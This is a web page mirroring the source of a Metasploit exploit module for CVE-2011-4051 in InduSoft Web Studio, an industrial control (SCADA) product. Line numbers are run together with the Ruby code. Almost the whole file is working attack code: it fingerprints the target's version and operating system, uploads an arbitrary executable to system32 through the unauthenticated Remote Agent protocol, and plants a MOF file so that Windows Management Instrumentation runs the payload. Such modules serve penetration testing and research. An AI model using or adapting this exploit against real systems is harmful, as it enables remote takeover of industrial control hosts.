Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/scada/indusoft_webstudio_exec.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::EXE10include Msf::Exploit::WbemExec1112def initialize(info = {})13super(update_info(info,14'Name' => 'InduSoft Web Studio Arbitrary Upload Remote Code Execution',15'Description' => %q{16This module exploits a lack of authentication and authorization on the InduSoft17Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to18the filesystem, by abusing the functions provided by the software.1920The module uses the Windows Management Instrumentation service to execute an21arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre22Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows23XP SP3 and Windows 2003 SP2.24},25'Author' =>26[27'Luigi Auriemma', # Vulnerability Discovery28'juan vazquez' # Metasploit module29],30'License' => MSF_LICENSE,31'References' =>32[33[ 'CVE', '2011-4051' ],34[ 'OSVDB', '77179' ],35[ 'BID', '50675' ],36[ 'ZDI', '11-330' ]37],38'Privileged' => true,39'Payload' =>40{41'BadChars' => "",42},43'Platform' => 'win',44'Targets' =>45[46[ 'Windows XP / 2003', { } ],47],48'DefaultTarget' => 0,49'DisclosureDate' => '2011-11-04'))5051register_options([Opt::RPORT(4322)])52end5354def check55connect5657# Get Application version58data = [0x14].pack("C")59sock.put(data)60app_info = sock.get_once61disconnect6263if app_info =~ /InduSoft Web Studio v6\.1/64return Exploit::CheckCode::Appears65elsif app_info =~ /InduSoft Web Studio/66return Exploit::CheckCode::Detected67end6869return Exploit::CheckCode::Safe7071end7273def upload_file(filename, my_payload)74connect7576# Get Application version77data = [0x14].pack("C")78sock.put(data)79app_info = sock.get_once80if app_info !~ /InduSoft Web Studio/81print_error("#{@peer} - InduSoft Web Sutio hasn't been detected, trying to exploit anyway...")82end8384# Get Operating System85data = [0x13].pack("C")86sock.put(data)87os_info = sock.get_once88if os_info !~ /WINXP/ and os_info !~ /WIN2K3/89print_error("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...")90end9192# Upload file9394data = "\x02\x37" # Command => Select destination95data << [my_payload.length].pack("V") # Data length96data << "#{filename}" # File name to upload97data << "\x09\x00\x30\x00\x00\x00"98data << "\x10\x03" # End of packet99100# The data must be split on 1024 length chunks101offset = 0 # Data to send102count = 1 # Number of chunks sent103groups = 0 # Data must be sent in groups of 50 chunks104105chunk = my_payload[offset, 1024]106107while not chunk.nil?108109# If there is a group of chunks, send it110if count % 51 == 0111112data << "\x02\x2c" # Command => Send group of chunks113my_count = [count].pack("V") # Number of chunks114data << my_count.gsub(/\x10/, "\x10\x10")115data << "\x10\x03" # End of packet116117sock.put(data)118res = sock.get_once119if res !~ /\x02\x06\x10\x03/120return res121end122123count = count + 1124groups = groups + 1125data = ""126127end128129pkt = [ 0x02, 0x2e ].pack("C*") # Command => Chunk Data130my_count = [count].pack("V")131pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID132pkt << [chunk.length].pack("V").gsub(/\x10/, "\x10\x10") # Chunk Data length133pkt << chunk.gsub(/\x10/, "\x10\x10") # Chunk Data134pkt << "\x10\x03" # End of packet135136data << pkt137offset = (count - groups) * 1024138chunk = my_payload[offset, 1024]139count = count + 1140end141142pkt = [ 0x02, 0x03].pack("C*") # Command => End of File143my_count = [count].pack("V")144pkt << my_count.gsub(/\x10/, "\x10\x10") # Chunk ID145pkt << rand_text_alpha(8) # LastWriteTime146pkt << rand_text_alpha(8) # LastAccessTime147pkt << rand_text_alpha(8) # CreationTime148pkt << "\x20\x00\x00\x00" # FileAttributes => FILE_ATTRIBUTE_ARCHIVE (0x20)149pkt << rand_text_alpha(1)150pkt << "\x10\x03" # End of packet151data << pkt152153sock.put(data)154res = sock.get_once155disconnect156157return res158159end160161def exploit162163@peer = "#{rhost}:#{rport}"164165exe = generate_payload_exe166exe_name = rand_text_alpha(rand(10)+5) + '.exe'167168mof_name = rand_text_alpha(rand(10)+5) + '.mof'169mof = generate_mof(mof_name, exe_name)170171print_status("#{@peer} - Uploading the exe payload to C:\\WINDOWS\\system32\\#{exe_name}")172res = upload_file("C:\\WINDOWS\\system32\\#{exe_name}", exe)173if res =~ /\x02\x06\x10\x03/174print_good "#{@peer} - The exe payload has been uploaded successfully"175else176print_error "#{@peer} - Error uploading the exe payload"177return178end179180print_status("#{@peer} - Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}")181res = upload_file("c:\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)182if res =~ /\x02\x06\x10\x03/183print_good "#{@peer} - The mof file has been uploaded successfully"184else185print_error "#{@peer} - Error uploading the mof file"186return187end188189end190end191192193